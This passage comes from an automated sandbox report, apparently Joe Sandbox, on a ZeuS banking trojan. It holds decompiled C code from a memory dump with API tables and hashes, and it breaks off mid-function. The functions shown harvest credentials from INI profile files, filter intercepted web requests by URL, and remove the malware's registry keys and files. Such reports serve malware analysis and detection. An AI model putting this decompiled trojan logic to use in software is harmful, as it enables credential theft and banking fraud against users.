					_t89 = GetUrlCacheEntryInfoW(_a4, _t107,  &_v28);
					__eflags = _t89;
					if(_t89 != 0) {
						_t91 =  *(_t107 + 8);
						__eflags = _t91;
						if(_t91 != 0) {
							__eflags =  *_t91;
							if( *_t91 != 0) {
								E0040A39D(_t91, _v12, _v20);
							}
						}
					}
					E004051E6(_t107);
					goto L18;
				} else {
					 *_t99 =  *((intOrPtr*)(_t96 + 0x20));
					L32:
					goto L33;
				}
			}

0x00416520
0x0041652b
0x00416531
0x00416536
0x0041653e
0x004166e9
0x004166ee
0x004166fa
0x004166fa
0x00416547
0x00416551
0x00000000
0x00000000
0x00416558
0x0041655e
0x00416572
0x00416575
0x00416577
0x00416579
0x00416579
0x00416579
0x0041657c
0x00416580
0x0041668b
0x0041668b
0x0041668e
0x00416691
0x00416693
0x00416697
0x00416699
0x00416699
0x0041669c
0x0041669e
0x004166a0
0x004166a4
0x004166b5
0x004166b5
0x004166b8
0x004166bb
0x004166bf
0x004166c3
0x004166d0
0x004166d5
0x004166d5
0x004166d5
0x004166d5
0x004166c3
0x004166d8
0x004166db
0x004166dd
0x004166df
0x004166df
0x004166e1
0x004166e1
0x00416697
0x00000000
0x00416691
0x0041658e
0x004165a8
0x004165ab
0x004165b1
0x004165b5
0x0041667c
0x0041667c
0x0041667c
0x0041667c
0x00416685
0x00000000
0x00416685
0x004165be
0x004165c0
0x004165c5
0x004165c8
0x00416677
0x00000000
0x00416677
0x004165db
0x004165e5
0x004165f3
0x004165f8
0x004165fa
0x00416660
0x00416661
0x00416669
0x0041666f
0x00000000
0x0041666f
0x00416602
0x00416607
0x0041660a
0x0041660c
0x00000000
0x00000000
0x00416613
0x0041661b
0x0041661d
0x0041661f
0x00416658
0x0041665b
0x00000000
0x0041665b
0x00416629
0x0041662f
0x00416635
0x00416637
0x00416639
0x0041663c
0x0041663e
0x00416640
0x00416644
0x0041664d
0x0041664d
0x00416644
0x0041663e
0x00416653
0x00000000
0x00416568
0x0041656b
0x004166e8
0x00000000
0x004166e8

APIs

EnterCriticalSection.KERNEL32(00423420), ref: 0041652B
LeaveCriticalSection.KERNEL32(00423420), ref: 0041658E
EnterCriticalSection.KERNEL32(00423420), ref: 004165AB
GetUrlCacheEntryInfoW.WININET(?,00000000,000000FF), ref: 0041662F
SetLastError.KERNEL32(00002EE4), ref: 00416685
LeaveCriticalSection.KERNEL32(00423420), ref: 004166EE

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CriticalSection$EnterLeave$CacheEntryErrorInfoLast
String ID:
API String ID: 3653105453-0
Opcode ID: 6bfefdb4f30c7ef8e8486ee681594fcb7aa45fe6dd1c788c387d096db1c24bcd
Instruction ID: 44f88c0864a88631713b66dc6c905baa4380e68839e8ec37f8a1657d21b09a30
Opcode Fuzzy Hash: 6bfefdb4f30c7ef8e8486ee681594fcb7aa45fe6dd1c788c387d096db1c24bcd
Instruction Fuzzy Hash: 4C516E31A00215ABCF11DF65D885BDF7BB4EF04354F0642AAF811AB2A5D738DA91CF98

Uniqueness

Uniqueness Score: -1.00%

Function 00413F6F, Relevance: 9.1, APIs: 6, Instructions: 148
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E00413F6F(void* __edx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				WCHAR* _v8;
				WCHAR* _v12;
				short* _v16;
				WCHAR* _v20;
				short _v32;
				short _v48;
				short _v68;
				short _v88;
				short _v112;
				char _v144;
				void* __edi;
				void* __esi;
				WCHAR* _t40;
				long _t41;
				void* _t48;
				void* _t50;
				void* _t52;
				void* _t54;
				void* _t56;
				WCHAR* _t61;
				WCHAR* _t64;
				void* _t72;
				void* _t76;
				WCHAR* _t83;
				WCHAR* _t84;
				WCHAR* _t86;
				intOrPtr _t96;
				void* _t97;

				_t81 = __edx;
				_t40 = E004051B6(0x1fffe);
				_t86 = _t40;
				_v20 = _t86;
				if(_t86 == 0) {
					return _t40;
				}
				_t41 = GetPrivateProfileStringW(0, 0, 0, _t86, 0xffff, _a4);
				if(_t41 <= 0) {
					L17:
					return E004051E6(_t86);
				}
				_t3 = _t41 + 1; // 0x1
				if(E00406096(_t86, _t3) == 0) {
					goto L17;
				}
				_t83 = E004051B6(0xc08);
				_v12 = _t83;
				if(_t83 == 0) {
					goto L17;
				} else {
					_t5 =  &(_t83[0x2fd]); // 0x5fa
					_v16 = _t5;
					_v8 = _t86;
					_t48 = 0x65;
					E0040F34A(_t48,  &_v112);
					_t50 = 0x66;
					E0040F34A(_t50,  &_v48);
					_t52 = 0x67;
					E0040F34A(_t52,  &_v32);
					_t54 = 0x68;
					E0040F34A(_t54,  &_v88);
					_t56 = 0x69;
					E0040F34A(_t56,  &_v68);
					goto L6;
					L15:
					_t61 = E004060D2(_v8, 1);
					_v8 = _t61;
					if(_t61 != 0) {
						_t83 = _v12;
						L6:
						if(StrStrIW(_v8,  &_v112) == 0) {
							_t64 = StrStrIW(_v8,  &_v48);
							if(_t64 == 0 && GetPrivateProfileStringW(_v8,  &_v32, _t64, _t83, 0xff, _a4) != 0) {
								_t84 =  &(_t83[0xff]);
								if(GetPrivateProfileStringW(_v8,  &_v88, 0, _t84, 0xff, _a4) != 0) {
									_t26 =  &(_t84[0xff]); // 0x0
									_t94 = _t26;
									if(GetPrivateProfileStringW(_v8,  &_v68, 0, _t26, 0xff, _a4) != 0 && E00413E04(_t81, _t94) > 0) {
										_t95 =  &_v144;
										_t72 = 0x56;
										E0040F34A(_t72,  &_v144);
										_push(_v12);
										_t30 =  &(_t84[0xff]); // 0x0
										_push(_t84);
										_t85 = _v16;
										_t81 = 0x307;
										_t76 = E00405ED9(_t95, 0x307, _v16, _t95);
										_t97 = _t97 + 0x10;
										if(_t76 > 0) {
											_t96 = _a8;
											if(E004055DA(_t76, _t96, _t85) != 0) {
												 *((intOrPtr*)(_t96 + 4)) =  *((intOrPtr*)(_t96 + 4)) + 1;
											}
										}
									}
								}
							}
						}
						goto L15;
					} else {
						E004051E6(_v12);
						_t86 = _v20;
						goto L17;
					}
				}
			}

0x00413f6f
0x00413f80
0x00413f85
0x00413f89
0x00413f8e
0x0041410f
0x0041410f
0x00413fa6
0x00413faa
0x00414105
0x00000000
0x00414106
0x00413fb0
0x00413fbc
0x00000000
0x00000000
0x00413fcc
0x00413fce
0x00413fd3
0x00000000
0x00413fd9
0x00413fd9
0x00413fe1
0x00413fe4
0x00413fea
0x00413feb
0x00413ff5
0x00413ff6
0x00414000
0x00414001
0x0041400b
0x0041400c
0x00414016
0x00414017
0x0041401c
0x004140e5
0x004140ea
0x004140ef
0x004140f4
0x0041401e
0x00414021
0x00414032
0x0041403f
0x00414043
0x00414068
0x0041407d
0x00414086
0x00414086
0x00414097
0x004140a5
0x004140ab
0x004140ac
0x004140b1
0x004140b4
0x004140bb
0x004140bc
0x004140c2
0x004140c7
0x004140cc
0x004140d1
0x004140d3
0x004140e0
0x004140e2
0x004140e2
0x004140e0
0x004140d1
0x00414097
0x0041407d
0x00414043
0x00000000
0x004140fa
0x004140fd
0x00414102
0x00000000
0x00414102
0x004140f4

APIs

GetPrivateProfileStringW.KERNEL32 ref: 00413FA6

Part of subcall function 004051B6: HeapAlloc.KERNEL32(00000008,-00000004,00406984,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051C7

StrStrIW.SHLWAPI(?,?), ref: 0041402E
StrStrIW.SHLWAPI(?,?), ref: 0041403F
GetPrivateProfileStringW.KERNEL32 ref: 0041405B
GetPrivateProfileStringW.KERNEL32 ref: 00414079
GetPrivateProfileStringW.KERNEL32 ref: 00414093

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: PrivateProfileString$AllocHeap
String ID:
API String ID: 2479592106-0
Opcode ID: 23dce95101567636ef4d146e7f727dadeab61daae526e19893cfd21531cf52d6
Instruction ID: 147e4022773acb23037d31fa521a8705d1120ce0d59bc311a6edd01bd2fe7ae5
Opcode Fuzzy Hash: 23dce95101567636ef4d146e7f727dadeab61daae526e19893cfd21531cf52d6
Instruction Fuzzy Hash: 90416332D0011ABBDF109BE68D05AEFBB79EF44754F104036BA04F7291DB39AE558B94

Uniqueness

Uniqueness Score: -1.00%

Function 00411CFA, Relevance: 9.1, APIs: 4, Strings: 1, Instructions: 395
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E00411CFA(intOrPtr _a4) {
				char _v9;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v32;
				char _v36;
				char _v60;
				char _v72;
				signed int _v76;
				char* _v80;
				void* _v96;
				intOrPtr _v148;
				void* _v160;
				char _v168;
				char _v272;
				char _v536;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t128;
				intOrPtr* _t129;
				char* _t130;
				void* _t137;
				void* _t140;
				void* _t144;
				void* _t152;
				void* _t154;
				char* _t156;
				void* _t161;
				void* _t163;
				void* _t164;
				void* _t167;
				void* _t172;
				intOrPtr _t174;
				intOrPtr* _t176;
				void* _t177;
				void* _t182;
				intOrPtr _t186;
				intOrPtr _t187;
				signed int _t189;
				void* _t194;
				void* _t197;
				void* _t198;
				void* _t199;
				int _t204;
				void* _t207;
				signed int _t210;
				void* _t214;
				signed int _t217;
				signed int _t218;
				void* _t219;
				void* _t224;
				char* _t227;
				intOrPtr _t228;
				char* _t233;
				char* _t236;
				intOrPtr _t238;
				signed int _t239;
				intOrPtr _t240;
				void* _t244;
				void* _t247;

				_t217 = 0;
				_v16 = 0;
				_v9 = 0xff;
				EnterCriticalSection(0x4233fc);
				_t225 =  *0x423418;
				if( *0x423418 == 0 ||  *0x423414 == 0) {
					_t240 = _a4;
				} else {
					_t240 = _a4;
					_t230 = 0;
					if(E0041142F(_t225, 0,  *(_t240 + 8),  *(_t240 + 0xc)) != 0) {
						_t210 = E0041D77E();
						_v20 = _t210;
						if(_t210 != 0) {
							_t214 = E004114E9(0, 4,  &_v20,  *0x423414);
							_push(_v20);
							if(_t214 == 0) {
								E004051E6();
							}
							E0041D7E9(_t225);
						}
						E004051E6( *0x423414);
						E004051E6( *0x423418);
						 *0x423414 = _t217;
						 *0x423418 = _t217;
					}
				}
				LeaveCriticalSection(0x4233fc);
				_t128 =  *((intOrPtr*)(_t240 + 0x40));
				_t254 = _t128 - _t217;
				if(_t128 == _t217) {
					L38:
					if((_v16 & 0x00000001) == 0) {
						_t187 =  *((intOrPtr*)(_t240 + 0x44));
						_t272 = _t187 - _t217;
						if(_t187 != _t217 && E004116EA(_t225, _t230, _t272, 3, _t187,  *(_t240 + 8),  *(_t240 + 0xc), _t217) != 0) {
							_v16 = _v16 | 0x00000001;
						}
					}
					if( *(_t240 + 0x20) >= 0x21) {
						_t182 = 0x10;
						E0040F314(_t182,  &_v72);
						_t238 =  *((intOrPtr*)(_t240 + 0x1c));
						if(E00405257( &_v72, _t238, 0x21) == 0) {
							_t186 =  *((intOrPtr*)(_t238 + 0x21));
							if(_t186 == 0x3b || _t186 == 0) {
								_v16 = _v16 | 0x00000010;
							}
						}
					}
					_t129 =  *((intOrPtr*)(_t240 + 0x2c));
					_v24 = _t217;
					if(_t129 == _t217 ||  *_t129 == _t217) {
						L52:
						_t130 =  *((intOrPtr*)(_t240 + 0x34));
						__eflags = _t130 - _t217;
						if(_t130 == _t217) {
							goto L60;
						}
						__eflags =  *_t130;
						if( *_t130 == 0) {
							goto L60;
						}
						_t167 = 0x12;
						E0040F34A(_t167,  &_v168);
						_t172 = E00405F54( &_v24,  &_v168,  *((intOrPtr*)(_a4 + 0x34)));
						_t247 = _t247 + 0xc;
						goto L55;
					} else {
						_t176 =  *((intOrPtr*)(_t240 + 0x30));
						if(_t176 == _t217 ||  *_t176 == _t217) {
							goto L52;
						} else {
							_t177 = 0x11;
							E0040F34A(_t177,  &_v272);
							_push( *((intOrPtr*)(_a4 + 0x30)));
							_t172 = E00405F54( &_v24,  &_v272,  *((intOrPtr*)(_a4 + 0x2c)));
							_t247 = _t247 + 0x10;
							L55:
							if(_t172 > _t217) {
								_t174 = E00406595(_v24, _t172 + _t172);
								if( *0x42341c != _t174) {
									_t64 =  &_v16;
									 *_t64 = _v16 | 0x00000020;
									__eflags =  *_t64;
									 *0x42341c = _t174;
								} else {
									E004051E6(_v24);
									_v24 = _t217;
								}
							}
							_t240 = _a4;
							L60:
							if(_v9 != 0xff) {
								__eflags = _v9 - 1;
								if(_v9 != 1) {
									L67:
									if((_v16 & 0x00000008) == 0) {
										L93:
										E004051E6(_v24);
										_t218 = _v16;
										if((_t218 & 0x00000001) == 0) {
											if(E00411752(_t230, _t240) != 0) {
												_t218 = _t218 | 0x00000002;
											}
											if((_t218 & 0x00000010) != 0 && E00411B0C(_t240, _t230) != 0) {
												_t218 = _t218 | 0x00000004;
											}
										}
										return _t218;
									}
									_t136 =  *(_t240 + 0x28);
									_t219 = 0;
									if( *(_t240 + 0x28) != 0) {
										__eflags = _v16 & 0x00000010;
										if((_v16 & 0x00000010) == 0) {
											__eflags =  *(_t240 + 0x20);
											if( *(_t240 + 0x20) != 0) {
												L92:
												_v16 = _v16 & 0xfffffff7;
												goto L93;
											}
											_t233 =  &_v36;
											_t137 = 0xc;
											E0040F314(_t137, _t233);
											_push(_t233);
											_push(9);
											L81:
											_pop(_t140);
											_v20 = E00405644(_t140);
											L82:
											if(_v20 == 0) {
												goto L92;
											}
											E00404CEF( &_v32);
											_t144 = E00405426( *(_t240 + 0xc), 0,  *(_t240 + 8));
											_t235 = _t144;
											if(_t144 != 0) {
												_t230 = 0x3c;
												E00405299( &_v160,  &_v160, 0, _t230);
												_v160 = _t230;
												if(InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v160) == 1) {
													_t152 = 0xa;
													E0040F34A(_t152,  &_v272);
													_t154 = 0xd;
													E0040F34A(_t154,  &_v60);
													_t227 =  *(_a4 + 0x10);
													_t156 = 0x4030e8;
													_t230 =  ==  ? 0x4030e8 : _v24;
													_t244 =  ==  ? 0x4030e8 : _v32;
													if(_t227 == 0) {
														_t227 = "-";
													}
													if((_v16 & 0x00000001) != 0) {
														_t156 =  &_v60;
													}
													_push(_v20);
													_push(_t230);
													_push(_t244);
													_push(_t227);
													_push(_t156);
													_t161 = E00418864(_t227, _t230, (0 | _v148 == 0x00000004) + 0xb, (0 | _v148 == 0x00000004) + 0xb, _t235, 0,  &_v272, _t235);
													_t240 = _a4;
													_t219 = _t161;
												}
												E004051E6(_t235);
											}
											E004051E6(_v32);
											E004051E6(_v20);
											if(_t219 != 0) {
												goto L93;
											} else {
												goto L92;
											}
										}
										_t230 = E00405644(_t136,  *((intOrPtr*)(_t240 + 0x24)));
										_v20 = _t230;
										__eflags = _t230;
										if(_t230 == 0) {
											goto L92;
										}
										_t163 = 0;
										__eflags =  *(_t240 + 0x28);
										if( *(_t240 + 0x28) <= 0) {
											goto L82;
										} else {
											goto L73;
										}
										do {
											L73:
											_t228 =  *((intOrPtr*)(_t163 + _t230));
											__eflags = _t228 - 0x26;
											if(_t228 != 0x26) {
												__eflags = _t228 - 0x2b;
												if(_t228 == 0x2b) {
													 *((char*)(_t163 + _t230)) = 0x20;
												}
											} else {
												 *((char*)(_t163 + _t230)) = 0xa;
											}
											_t163 = _t163 + 1;
											__eflags = _t163 -  *(_t240 + 0x28);
										} while (_t163 <  *(_t240 + 0x28));
										goto L82;
									}
									_t236 =  &_v36;
									_t164 = 0xb;
									E0040F314(_t164, _t236);
									_push(_t236);
									_push(7);
									goto L81;
								}
								L66:
								_v16 = _v16 | 0x00000008;
								goto L67;
							}
							if( *((char*)(_t240 + 0x18)) != 1 ||  *(_t240 + 0x28) <= _t217) {
								if((_v16 & 0x00000020) == 0) {
									goto L67;
								}
							}
							goto L66;
						}
					}
				}
				_t189 = E0040AD5E( &_v32, _t230, _t254, _t128, 0x4e25, 0x10000000);
				_t225 = _v32;
				_v20 = _t189;
				if(E00406078(_t189, _v32) == 0) {
					L37:
					E004051E6(_v20);
					_t217 = 0;
					goto L38;
				} else {
					_t239 = _v20;
					do {
						_t225 = _t239 + 1;
						if( *_t225 == 0) {
							goto L36;
						}
						_t194 =  *_t239;
						if(_t194 == 0x21) {
							L22:
							_t239 = _t225;
							L23:
							_t230 = 0;
							_t225 = _t239;
							if(E0041142F(_t239, 0,  *(_t240 + 8),  *(_t240 + 0xc)) == 0) {
								goto L36;
							}
							_t197 = _t224;
							if(_t197 == 0) {
								_v9 = 0;
								L35:
								if(_t224 != 2) {
									goto L37;
								}
								goto L36;
							}
							_t198 = _t197 - 1;
							if(_t198 == 0) {
								L30:
								_v9 = 1;
								goto L35;
							}
							_t199 = _t198 - 1;
							if(_t199 == 0) {
								_t230 = 0x3c;
								E00405299( &_v96,  &_v96, 0, 0);
								_v80 =  &_v536;
								_v96 = 0;
								_v76 = 0x103;
								_t204 = InternetCrackUrlA( *(_t240 + 8),  *(_t240 + 0xc), 0,  &_v96);
								__eflags = _t204 - 1;
								if(_t204 == 1) {
									__eflags = _v76;
									if(_v76 > 0) {
										E00404CA9( &_v536);
									}
								}
								goto L35;
							}
							_t207 = _t199 - 1;
							if(_t207 == 0 || _t207 == 1) {
								_v16 = _v16 | 0x00000001;
								goto L30;
							} else {
								goto L35;
							}
						}
						if(_t194 == 0x2d) {
							goto L22;
						}
						if(_t194 == 0x40) {
							goto L22;
						}
						if(_t194 == 0x5e) {
							_t224 = 4;
							goto L22;
						} else {
							_t224 = 0;
							goto L23;
						}
						L36:
						_t239 = E004060B6(_t239, 1);
					} while (_t239 != 0);
					goto L37;
				}
			}

0x00411d0b
0x00411d0e
0x00411d11
0x00411d15
0x00411d1b
0x00411d23
0x00411d94
0x00411d2d
0x00411d2d
0x00411d33
0x00411d3f
0x00411d41
0x00411d46
0x00411d4b
0x00411d59
0x00411d5e
0x00411d63
0x00411d65
0x00411d6a
0x00411d6b
0x00411d6b
0x00411d76
0x00411d81
0x00411d86
0x00411d8c
0x00411d8c
0x00411d3f
0x00411d98
0x00411d9e
0x00411da1
0x00411da3
0x00411ea8
0x00411eac
0x00411eae
0x00411eb1
0x00411eb3
0x00411ec8
0x00411ec8
0x00411eb3
0x00411ed0
0x00411ed7
0x00411ed8
0x00411edd
0x00411eee
0x00411ef0
0x00411ef5
0x00411efb
0x00411efb
0x00411ef5
0x00411eee
0x00411eff
0x00411f02
0x00411f07
0x00411f42
0x00411f42
0x00411f45
0x00411f47
0x00000000
0x00000000
0x00411f49
0x00411f4c
0x00000000
0x00000000
0x00411f56
0x00411f57
0x00411f69
0x00411f6e
0x00000000
0x00411f0e
0x00411f0e
0x00411f13
0x00000000
0x00411f1a
0x00411f22
0x00411f23
0x00411f2b
0x00411f38
0x00411f3d
0x00411f71
0x00411f73
0x00411f7b
0x00411f86
0x00411f95
0x00411f95
0x00411f95
0x00411f99
0x00411f88
0x00411f8b
0x00411f90
0x00411f90
0x00411f86
0x00411f9e
0x00411fa1
0x00411fa5
0x00411fba
0x00411fbe
0x00411fc4
0x00411fc8
0x0041213b
0x0041213e
0x00412143
0x00412149
0x00412153
0x00412155
0x00412155
0x0041215b
0x00412168
0x00412168
0x0041215b
0x00412171
0x00412171
0x00411fce
0x00411fd1
0x00411fd5
0x00411fe9
0x00411fed
0x0041202a
0x0041202e
0x00412137
0x00412137
0x00000000
0x00412137
0x00412036
0x00412039
0x0041203a
0x00412041
0x00412042
0x00412044
0x00412044
0x0041204a
0x0041204d
0x00412051
0x00000000
0x00000000
0x0041205a
0x00412067
0x0041206c
0x00412070
0x00412078
0x00412083
0x00412094
0x004120a6
0x004120b0
0x004120b1
0x004120bb
0x004120bc
0x004120ca
0x004120cf
0x004120d4
0x004120d9
0x004120de
0x004120e0
0x004120e0
0x004120e9
0x004120eb
0x004120eb
0x004120ee
0x004120f1
0x004120f2
0x004120f3
0x004120f4
0x00412110
0x00412115
0x0041211b
0x0041211b
0x0041211e
0x0041211e
0x00412126
0x0041212e
0x00412135
0x00000000
0x00000000
0x00000000
0x00000000
0x00412135
0x00411ff7
0x00411ff9
0x00411ffc
0x00411ffe
0x00000000
0x00000000
0x00412004
0x00412006
0x00412009
0x00000000
0x00000000
0x00000000
0x00000000
0x0041200b
0x0041200b
0x0041200b
0x0041200e
0x00412011
0x00412019
0x0041201c
0x0041201e
0x0041201e
0x00412013
0x00412013
0x00412013
0x00412022
0x00412023
0x00412023
0x00000000
0x00412028
0x00411fd9
0x00411fdc
0x00411fdd
0x00411fe4
0x00411fe5
0x00000000
0x00411fe5
0x00411fc0
0x00411fc0
0x00000000
0x00411fc0
0x00411fab
0x00411fb6
0x00000000
0x00000000
0x00411fb8
0x00000000
0x00411fab
0x00411f13
0x00411f07
0x00411db7
0x00411dbc
0x00411dbf
0x00411dc9
0x00411e9e
0x00411ea1
0x00411ea6
0x00000000
0x00411dcf
0x00411dcf
0x00411dd2
0x00411dd2
0x00411dd8
0x00000000
0x00000000
0x00411dde
0x00411de2
0x00411e02
0x00411e02
0x00411e04
0x00411e07
0x00411e0c
0x00411e15
0x00000000
0x00000000
0x00411e1a
0x00411e1d
0x00411e82
0x00411e86
0x00411e89
0x00000000
0x00000000
0x00000000
0x00411e89
0x00411e1f
0x00411e20
0x00411e2f
0x00411e2f
0x00000000
0x00411e2f
0x00411e22
0x00411e23
0x00411e37
0x00411e3f
0x00411e4a
0x00411e56
0x00411e5c
0x00411e63
0x00411e69
0x00411e6c
0x00411e6e
0x00411e72
0x00411e7b
0x00411e7b
0x00411e72
0x00000000
0x00411e6c
0x00411e25
0x00411e26
0x00411e2b
0x00000000
0x00000000
0x00000000
0x00000000
0x00411e26
0x00411de6
0x00000000
0x00411dfc
0x00411dea
0x00000000
0x00411df8
0x00411dee
0x00411df4
0x00000000
0x00411df0
0x00411df0
0x00000000
0x00411df0
0x00411e8b
0x00411e94
0x00411e96
0x00000000
0x00411dd2

APIs

EnterCriticalSection.KERNEL32(004233FC,-004233F0,00000000,004233D4), ref: 00411D15
LeaveCriticalSection.KERNEL32(004233FC), ref: 00411D98
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 00411E63
InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 0041209D

Part of subcall function 0041D77E: CreateMutexW.KERNEL32(004239E8,00000000,00423FC8,004233FC,?,?,00411D46,00000000,00000000), ref: 0041D7A6

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

Strings

, xrefs: 00411FB2

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CrackCriticalInternetSection$CreateEnterFreeHeapLeaveMutex
String ID:
API String ID: 4018265435-3916222277
Opcode ID: 87b26a5b7c153a221f951eb55c3b02f7f62683af5ab9cce4bb3c2e99aae10f8e
Instruction ID: 6857271f464a13cd1d597af27affdfde325de2ef6da90c031825e68885fd58da
Opcode Fuzzy Hash: 87b26a5b7c153a221f951eb55c3b02f7f62683af5ab9cce4bb3c2e99aae10f8e
Instruction Fuzzy Hash: A1D1D231A00705AEDF219BA1C941BEF7BB5EF04304F44846BEA41A72A1D77C9EC2CB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040CAB3, Relevance: 9.1, APIs: 6, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0040CAB3(void* __ebx, void* __ecx, void* __eflags) {
				char _v1168;
				char _v1668;
				char _v1680;
				short _v1688;
				char _v2192;
				short _v2208;
				char _v2720;
				char _v2728;
				char _v2992;
				char _v3072;
				void* __edi;
				void* __esi;
				void* _t34;
				WCHAR* _t50;
				WCHAR* _t51;
				WCHAR* _t52;
				void* _t56;
				void* _t65;

				_t65 = __eflags;
				_t46 = __ecx;
				_push(_t56);
				_t50 =  &_v1668;
				E0041CC9C(__ecx, _t50, _t56, 1);
				PathRemoveFileSpecW(_t50);
				_t51 =  &_v2192;
				E0041CC9C(_t46, _t51, PathRemoveFileSpecW, 2);
				PathRemoveFileSpecW(_t51);
				 *0x4239b0 =  *0x4239b0 | 0x00000002;
				_push(0);
				E0040C041();
				E0041BE9C(_t46, _t65);
				E0040A860( &_v1680, _t65);
				E0040A860(_t51, _t65);
				_t52 =  &_v2720;
				E0041CC9C(_t51, _t52, PathRemoveFileSpecW, 3);
				SHDeleteKeyW(0x80000001, _t52);
				CharToOemW( &_v1688,  &_v2728);
				CharToOemW( &_v2208,  &_v2992);
				_t53 =  &_v3072;
				_t34 = 7;
				E0040F314(_t34,  &_v3072);
				_push( &_v2992);
				_push( &_v2728);
				_push( &_v2992);
				_push( &_v2728);
				if(E00405F1D( &_v3072, 0x474,  &_v1168, _t53) > 0) {
					E00406CA6(__ebx, 0x474,  &_v1168);
				}
				if( *0x423e78 == 0xffffffff) {
					ExitProcess(0);
				}
				return 1;
			}

0x0040cab3
0x0040cab3
0x0040cabf
0x0040cac3
0x0040caca
0x0040cad8
0x0040cadc
0x0040cae3
0x0040caeb
0x0040caed
0x0040caf4
0x0040caf6
0x0040cafb
0x0040cb07
0x0040cb0e
0x0040cb15
0x0040cb1c
0x0040cb29
0x0040cb45
0x0040cb54
0x0040cb58
0x0040cb5c
0x0040cb5d
0x0040cb66
0x0040cb6e
0x0040cb73
0x0040cb7b
0x0040cb95
0x0040cb9a
0x0040cb9a
0x0040cba6
0x0040cbaa
0x0040cbaa
0x0040cbb7

APIs

Part of subcall function 0041CC9C: PathRenameExtensionW.SHLWAPI(?,.dat,?,00423A10,00000032,77E49EB0,?,00000000), ref: 0041CD17

PathRemoveFileSpecW.SHLWAPI(?,00000001), ref: 0040CAD8
PathRemoveFileSpecW.SHLWAPI(?,00000002), ref: 0040CAEB

Part of subcall function 0040C041: SetEvent.KERNEL32(0040CAFB,00000000), ref: 0040C047
Part of subcall function 0040C041: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0040C05A

Part of subcall function 0041BE9C: SHDeleteValueW.SHLWAPI(80000001,?,?,FF220829,?,00000000,?,750D46D0), ref: 0041BED9
Part of subcall function 0041BE9C: Sleep.KERNEL32(000001F4), ref: 0041BEE8
Part of subcall function 0041BE9C: RegOpenKeyExW.ADVAPI32(80000001,?,00000000,00000001,?), ref: 0041BEFE

Part of subcall function 0040A860: FindFirstFileW.KERNEL32(?,?,?), ref: 0040A891
Part of subcall function 0040A860: FindNextFileW.KERNEL32(00000000,?), ref: 0040A8EC
Part of subcall function 0040A860: FindClose.KERNEL32(00000000), ref: 0040A8F7
Part of subcall function 0040A860: SetFileAttributesW.KERNEL32(?,00000080,?), ref: 0040A903
Part of subcall function 0040A860: RemoveDirectoryW.KERNEL32(?,?,00000080,?), ref: 0040A90A

SHDeleteKeyW.SHLWAPI(80000001,?,00000003,00000000), ref: 0040CB29
CharToOemW.USER32 ref: 0040CB45
CharToOemW.USER32 ref: 0040CB54
ExitProcess.KERNEL32 ref: 0040CBAA

Part of subcall function 00406CA6: CharToOemW.USER32 ref: 00406CD6
Part of subcall function 00406CA6: GetEnvironmentVariableW.KERNEL32(ComSpec,?,00000104,?,?,00000000,00000000), ref: 00406D5A

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: File$CharFindPathRemove$DeleteSpec$AttributesCloseDirectoryEnvironmentEventExitExtensionFirstNextObjectOpenProcessRenameSingleSleepValueVariableWait
String ID:
API String ID: 1572960351-0
Opcode ID: 84b4974f0afceff20669f4bc2495a6b390239d4bba102a39793c8cc330070334
Instruction ID: 5cf385416a9cc1a2a6bc46bbfad114d14fe76df5a1596ce88dd065d0d8ab4de7
Opcode Fuzzy Hash: 84b4974f0afceff20669f4bc2495a6b390239d4bba102a39793c8cc330070334
Instruction Fuzzy Hash: 3A21A4725083449BD230FB65DC46FDB77ACEB84314F04492BB548E7191DB78A505CBDA

Uniqueness

Uniqueness Score: -1.00%

Function 00407028, Relevance: 9.1, APIs: 6, Instructions: 74
filesynchronizationnetworkCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407028(void* _a4, WCHAR* _a8, intOrPtr _a12, void* _a16) {
				char _v5;
				long _v12;
				struct _OVERLAPPED* _v16;
				void* _v20;
				long _v24;
				void* _t28;
				long _t37;
				void* _t41;

				_v5 = 0;
